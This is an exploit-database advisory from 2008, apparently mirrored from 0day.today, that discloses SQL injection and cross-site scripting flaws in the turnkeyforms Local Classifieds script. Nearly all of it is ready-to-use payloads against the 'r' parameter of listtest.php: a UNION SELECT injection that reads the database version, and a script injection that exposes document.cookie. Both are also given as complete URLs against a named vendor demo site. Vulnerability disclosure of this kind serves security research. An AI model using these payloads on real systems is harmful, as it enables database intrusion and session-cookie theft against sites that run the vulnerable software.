id: 4110
date: 11/07/2008
title: turnkeyforms Local Classifieds (XSS/SQL) Multiple Vulnerabilities
author: TR-ShaRk
cves: 

=================================================================
turnkeyforms Local Classifieds (XSS/SQL) Multiple Vulnerabilities
=================================================================


##################################################################
#
#   Author: TR-ShaRk
#
#   Script : Local Classifieds Turnkeyforms
#
######################
#
#   SQL Injection Vuln. :
#
#   listtest.php?r=-39+union+select+1,@@version--
#
#   Xss:
#
#   listtest.php?r="><script>alert(document.cookie)</script>
#
######################
#
#   Demo:
#
#
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r="><script>alert(document.cookie)</script>
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=-39+union+select+1,@@version--
#
######################



#  0day.today [2023-03-23]  #